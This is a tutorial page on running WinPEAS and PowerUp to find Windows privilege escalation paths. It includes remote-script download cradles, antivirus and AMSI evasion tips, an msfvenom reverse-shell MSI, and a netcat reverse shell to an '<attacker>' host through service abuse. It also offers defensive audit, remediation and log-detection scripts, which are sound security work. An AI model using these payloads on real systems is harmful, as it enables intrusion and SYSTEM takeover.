WinPEAS and PowerUp

Automated enumeration tools that find privilege escalation vectors in seconds

What You'll Discover

🎯 Why This Matters

Manual enumeration is thorough but time-consuming. WinPEAS and PowerUp scan for hundreds of privilege escalation vectors in seconds, giving you immediate attack paths. These are the same tools used in professional penetration tests and red team operations.

🔍 What You'll Learn

  • How to deploy and run WinPEAS on target systems
  • PowerUp.ps1 functions and their use cases
  • Interpreting scan results to prioritize attack paths
  • Avoiding detection when running automated tools

🚀 Your First Win

In the next 10 minutes, you'll understand how to run WinPEAS and PowerUp, and how to interpret their output to find actionable privilege escalation paths.

🔧 Try This Right Now

Download WinPEAS and examine its help options:

# Download WinPEAS (on your attack machine)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe

# Transfer to target and run
.\winPEASx64.exe -h
.\winPEASx64.exe quiet

You'll see: Comprehensive output covering system info, user privileges, services, scheduled tasks, network, and hundreds of other checks - all color-coded by severity.

Skills You'll Master

✅ Core Understanding

  • WinPEAS execution and output interpretation
  • PowerUp module structure and functions
  • Color-coded severity in scan results
  • Basic evasion techniques

🔍 Expert Skills

  • Selective scanning to avoid detection
  • In-memory execution techniques
  • Combining manual and automated results
  • Custom enumeration scripts

Understanding Automated Enumeration

WinPEAS and PowerUp are the industry-standard tools for Windows privilege escalation enumeration. They automate hundreds of checks that would take hours to perform manually. However, they're also well-known to defenders, so knowing how to use them effectively - and quietly - is essential.

WinPEAS = Comprehensive scan | PowerUp = PowerShell-based, targeted functions

WinPEAS Overview

WinPEAS (Windows Privilege Escalation Awesome Scripts) is part of the PEASS-ng suite. It's available as an executable or batch script and scans for misconfigurations across the entire system:

# Run full scan (default)
.\winPEASx64.exe

# Run quiet scan (less output, faster)
.\winPEASx64.exe quiet

# Run specific checks only
.\winPEASx64.exe servicesinfo
.\winPEASx64.exe userinfo
.\winPEASx64.exe systeminfo

# Redirect output to file (for review)
.\winPEASx64.exe > winpeas_output.txt

WinPEAS uses color coding to indicate severity:

  • RED: Critical - immediate privesc possible
  • YELLOW: Interesting - investigate further
  • GREEN: Informational

PowerUp Overview

PowerUp is a PowerShell script from the PowerSploit framework. Unlike WinPEAS's comprehensive scan, PowerUp provides individual functions you can call as needed:

# Load PowerUp
Import-Module .\PowerUp.ps1

# Run all checks
Invoke-AllChecks

# Or run from memory (AMSI may block)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

Key PowerUp Functions

PowerUp provides specific functions for targeted enumeration:

# Service enumeration
Get-UnquotedService              # Find unquoted service paths
Get-ModifiableServiceFile        # Services with writable binaries
Get-ModifiableService            # Services we can reconfigure

# Registry checks
Get-RegistryAlwaysInstallElevated  # Check AlwaysInstallElevated
Get-RegistryAutoLogon              # Find autologon credentials

# Scheduled tasks and startup
Get-ModifiableScheduledTaskFile   # Writable scheduled task binaries

# Exploitation functions
Write-ServiceBinary              # Replace a service binary
Install-ServiceBinary            # Install a new service
Invoke-ServiceAbuse              # Abuse a modifiable service
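The service checks above are the ones most worth reproducing on your own hosts, because the fix is cheap once the finding is confirmed. The following is an added example, not PowerUp or PEASS-ng code: it implements the condition Get-UnquotedService reports on (an unquoted ImagePath whose executable portion contains a space) with native cmdlets, and adds a remediation that quotes the path. The function names are invented for this example, and it assumes an elevated PowerShell session on the host being audited.

```powershell
# Added example; not PowerUp or PEASS-ng code. Applies the condition that
# PowerUp's Get-UnquotedService reports (unquoted ImagePath whose executable
# portion contains a space) using native cmdlets, then quotes the path to fix it.
# Assumes an elevated PowerShell session on the host being audited.

$ServicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $key = Join-Path $ServicesKey $svc.Name
        if (-not (Test-Path $key)) { continue }
        # Read ImagePath unexpanded so values such as %SystemRoot% survive a rewrite
        $raw = [string](Get-Item $key).GetValue('ImagePath', $null, 'DoNotExpandEnvironmentNames')
        if (-not $raw -or $raw -match '^["'']') { continue }   # empty or already quoted
        $exeEnd = $raw.ToLower().IndexOf('.exe')
        if ($exeEnd -lt 0) { continue }                          # drivers and non-exe hosts
        $exe = $raw.Substring(0, $exeEnd + 4)
        if ($exe -notmatch ' ') { continue }                     # no space, no search ambiguity
        [pscustomobject]@{
            Name       = $svc.Name
            RunsAs     = $svc.StartName
            StartMode  = $svc.StartMode
            Executable = $exe
            Arguments  = $raw.Substring($exeEnd + 4).Trim()
            ImagePath  = $raw
        }
    }
}

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipeline)] $Finding)
    process {
        $fixed = '"{0}"' -f $Finding.Executable
        if ($Finding.Arguments) { $fixed += ' ' + $Finding.Arguments }
        $key  = Join-Path $ServicesKey $Finding.Name
        $kind = (Get-Item $key).GetValueKind('ImagePath')   # preserve REG_SZ vs REG_EXPAND_SZ
        if ($PSCmdlet.ShouldProcess($Finding.Name, "Set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type $kind
        }
    }
}

# Review first, then apply (drop -WhatIf to change the registry)
Get-UnquotedServicePath | Format-Table Name, RunsAs, StartMode, Executable -AutoSize
Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```

The check reads ImagePath from the registry rather than Win32_Service.PathName so that REG_EXPAND_SZ values are written back unchanged; the new path is picked up on the next service start. Quoting removes the search ambiguity, but whether a low-privileged user can write to a directory on that path is a separate question (the one Get-ModifiableServiceFile answers), so the directory ACLs still need review.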

Tools and Techniques

WinPEAS Detailed Usage

WinPEAS accepts parameters to focus on specific areas:

# Available scan modules
.\winPEASx64.exe systeminfo       # Basic system information
.\winPEASx64.exe userinfo         # User and group information
.\winPEASx64.exe processinfo      # Running processes
.\winPEASx64.exe servicesinfo     # Windows services
.\winPEASx64.exe applicationsinfo # Installed applications
.\winPEASx64.exe networkinfo      # Network configuration
.\winPEASx64.exe windowscreds     # Credential hunting
.\winPEASx64.exe browserinfo      # Browser saved credentials
.\winPEASx64.exe filesinfo        # Interesting files
.\winPEASx64.exe eventsinfo       # Security events

# Combine modules
.\winPEASx64.exe servicesinfo windowscreds

Evasion Techniques

Both tools are heavily signatured. Here's how to reduce detection:

# Use the .bat version of WinPEAS (less detected)
.\winPEAS.bat

# Obfuscated PowerUp execution
$text = (New-Object Net.WebClient).DownloadString('https://<attacker>/PowerUp.ps1')
IEX $text

# Bypass AMSI for PowerShell (various techniques)
# Note: AMSI bypasses change frequently as Microsoft patches them

# Use Invoke-Obfuscation on PowerUp before deployment
# https://github.com/danielbohannon/Invoke-Obfuscation

# Execute WinPEAS from memory using a loader
# Embed in a C# loader or use reflection

Alternative Tools

When WinPEAS and PowerUp are blocked, alternatives exist:

  • Seatbelt - C# tool for host survey, less detected than WinPEAS
  • PrivescCheck - PowerShell privesc script, alternative to PowerUp
  • JAWS - Just Another Windows (Enum) Script, PowerShell-based
  • winPEASps1 - PowerShell version of WinPEAS

Real-World Attack Scenarios

🔴 Scenario: WinPEAS Reveals AlwaysInstallElevated

WinPEAS output shows AlwaysInstallElevated is enabled in both HKLM and HKCU. This means any .msi package will install with SYSTEM privileges. Generate a malicious MSI with msfvenom and execute it for instant SYSTEM.

# On attacker machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=443 -f msi -o shell.msi

# On target
msiexec /quiet /qn /i \\<attacker>\share\shell.msi
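To verify the same condition on your own systems and close it, the following is an added example, not WinPEAS or PowerUp code, that uses native cmdlets only. The function names are invented for it, and it assumes an elevated session; the HKCU part only covers the user running it.

```powershell
# Added example; not WinPEAS or PowerUp code. Reports whether AlwaysInstallElevated
# is effective (a DWORD of 1 in BOTH hives, the condition WinPEAS and
# Get-RegistryAlwaysInstallElevated flag) and clears it. Assumes an elevated session.

$InstallerKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)] [string] $Key)
    if (-not (Test-Path $Key)) { return $null }
    (Get-ItemProperty -Path $Key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
}

function Get-AlwaysInstallElevatedState {
    $hives = foreach ($key in $InstallerKeys) {
        $value = Get-AlwaysInstallElevatedValue -Key $key
        [pscustomobject]@{ Key = $key; Value = $value; Enabled = ($value -eq 1) }
    }
    [pscustomobject]@{
        Hives     = $hives
        # Windows Installer honours the policy only when both hives enable it
        Effective = (@($hives | Where-Object Enabled).Count -eq 2)
    }
}

function Disable-AlwaysInstallElevated {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($key in $InstallerKeys) {
        if ((Get-AlwaysInstallElevatedValue -Key $key) -ne 1) { continue }
        if ($PSCmdlet.ShouldProcess($key, 'Set AlwaysInstallElevated to 0')) {
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$state = Get-AlwaysInstallElevatedState
$state.Hives | Format-Table -AutoSize
if ($state.Effective) {
    Write-Warning 'AlwaysInstallElevated is effective: any user can install an MSI as SYSTEM'
    Disable-AlwaysInstallElevated -WhatIf     # drop -WhatIf to apply
}
```

A local registry change is overwritten at the next policy refresh if Group Policy set it, so the durable fix is the policy itself: "Always install with elevated privileges" under Windows Components > Windows Installer, in both Computer Configuration and User Configuration, set to Disabled. For after-the-fact review, Windows Installer writes MsiInstaller events to the Application log (Event ID 11707 on a completed installation), which shows what was installed while the setting was in effect.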

🟠 Scenario: PowerUp Identifies Modifiable Service

Get-ModifiableService reveals a custom service running as LocalSystem where your user has SERVICE_CHANGE_CONFIG rights. Use Invoke-ServiceAbuse to reconfigure the service and execute arbitrary commands.

# Abuse the service to add user to local admins
Invoke-ServiceAbuse -Name 'VulnerableService' -UserName 'hdna' -Password 'Password123!'

# Or execute a reverse shell
Invoke-ServiceAbuse -Name 'VulnerableService' -Command "C:\temp\nc.exe -e cmd.exe <attacker> 443"

💡 Expert Insight

Don't trust automated tools blindly. They can produce false positives and miss context-dependent vulnerabilities. Use them as a starting point, then validate findings manually. The best approach combines automated scanning for coverage with manual investigation for depth.

Defensive Countermeasures

Endpoint Detection

  • Deploy EDR solutions that detect WinPEAS, PowerUp, and similar tools
  • Enable PowerShell ScriptBlock logging to capture malicious scripts
  • Monitor for known enumeration command patterns
  • Alert on access to sensitive registry keys and files
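ScriptBlock logging is the control with the most purchase against the PowerUp usage on this page: the engine logs each script block as it is compiled, so a script fetched through a download cradle and handed to IEX is recorded as its own Event ID 4104 regardless of how the cradle was written. The following is an added example, not from the page's tools, that flags 4104 records containing the PowerUp function names and cradle shown above. The indicator list, function names and sample records are constructed for this example.

```powershell
# Added example; not from the page's tools. Scans PowerShell ScriptBlock logging
# events (ID 4104 in Microsoft-Windows-PowerShell/Operational) for the PowerUp
# function names and download cradle shown on this page. Indicator list and
# sample records are constructed for the example; extend them for your estate.

$EnumerationIndicators = @(
    @{ Name = 'PowerUp function';  Pattern = '\b(Invoke-AllChecks|Get-UnquotedService|Get-ModifiableService(File)?|Get-RegistryAlwaysInstallElevated|Invoke-ServiceAbuse|Write-ServiceBinary)\b' }
    @{ Name = 'Download cradle';   Pattern = 'Net\.WebClient\)?\s*\.DownloadString\s*\(' }
    @{ Name = 'Invoke-Expression'; Pattern = '\b(IEX|Invoke-Expression)\b' }
    @{ Name = 'PEASS reference';   Pattern = 'winPEAS|PEASS-ng' }
)

function Test-ScriptBlockText {
    param([AllowEmptyString()] [string] $Text)
    # Names of every indicator that matches; nothing returned means clean
    $EnumerationIndicators | Where-Object { $Text -match $_.Pattern } | ForEach-Object { $_.Name }
}

function Find-EnumerationScriptBlocks {
    param([Parameter(Mandatory)] [object[]] $Records)
    foreach ($r in $Records) {
        if (-not $r.ScriptBlockText) { continue }
        $hits = @(Test-ScriptBlockText -Text $r.ScriptBlockText)
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            TimeCreated = $r.TimeCreated
            Indicators  = ($hits -join ', ')
            Snippet     = $r.ScriptBlockText.Substring(0, [Math]::Min(70, $r.ScriptBlockText.Length))
        }
    }
}

function ConvertFrom-ScriptBlockEvent {
    # Live source: reads recent 4104 events into the record shape used above
    param([int] $MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event is the ScriptBlockText field
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; ScriptBlockText = [string]$_.Properties[2].Value }
        }
}

function Enable-ScriptBlockLogging {
    # Policy key read by PowerShell 5+; a GPO carrying the same setting overrides it
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# Constructed sample records standing in for live 4104 events
$SampleRecords = @(
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:00:00'; ScriptBlockText = 'Get-ChildItem C:\Users | Measure-Object' }
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:05:00'; ScriptBlockText = "IEX(New-Object Net.WebClient).DownloadString('https://<attacker>/PowerUp.ps1')" }
    [pscustomobject]@{ TimeCreated = '2024-01-01 09:06:00'; ScriptBlockText = 'Import-Module .\PowerUp.ps1; Invoke-AllChecks' }
)

Find-EnumerationScriptBlocks -Records $SampleRecords | Format-Table -AutoSize
# Live run: Find-EnumerationScriptBlocks -Records (ConvertFrom-ScriptBlockEvent)
```

On the sample records the first is clean, the second matches the cradle and Invoke-Expression indicators, and the third matches the PowerUp function indicator. Even without the policy enabled, PowerShell 5 writes Warning-level 4104 events for script blocks it considers suspicious, so the live query is worth running on hosts where logging was never turned on; enabling it with the function above (or the equivalent GPO) turns that partial record into a complete one.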

Application Control

  • Implement application whitelisting with Windows Defender Application Control
  • Block execution from writable directories (%TEMP%, Downloads)
  • Restrict PowerShell to Constrained Language Mode
  • Disable unnecessary scripting engines

Proactive Hardening

  • Run WinPEAS and PowerUp on your own systems during security assessments
  • Fix misconfigurations before attackers find them
  • Regular vulnerability scanning and patch management
  • Implement principle of least privilege across all services and accounts

Frequently Asked Questions

WinPEAS is getting detected by AV. What should I do?

Try the .bat version which is less signatured, use the obfuscated versions from the PEASS-ng releases, or consider alternative tools like Seatbelt or PrivescCheck. You can also compile WinPEAS yourself with modifications to avoid signatures.

PowerUp fails with "cannot be loaded because running scripts is disabled." What now?

This is PowerShell's execution policy. Bypass it with: powershell -ep bypass -c "IEX(Get-Content .\PowerUp.ps1 -Raw); Invoke-AllChecks" or use the download cradle to execute from memory.

Which tool should I run first - WinPEAS or PowerUp?

WinPEAS for comprehensive coverage, PowerUp when you want targeted checks or need exploitation functions. In practice, run WinPEAS for enumeration and have PowerUp ready for exploitation when you find a vector.

🎯 Automated Enumeration - Equipped!

You now know how to use WinPEAS and PowerUp to rapidly identify privilege escalation vectors. Combined with manual enumeration, you have comprehensive coverage of any Windows system.

Knowledge Validation

Chapter Question

What PowerUp function checks for unquoted service paths?
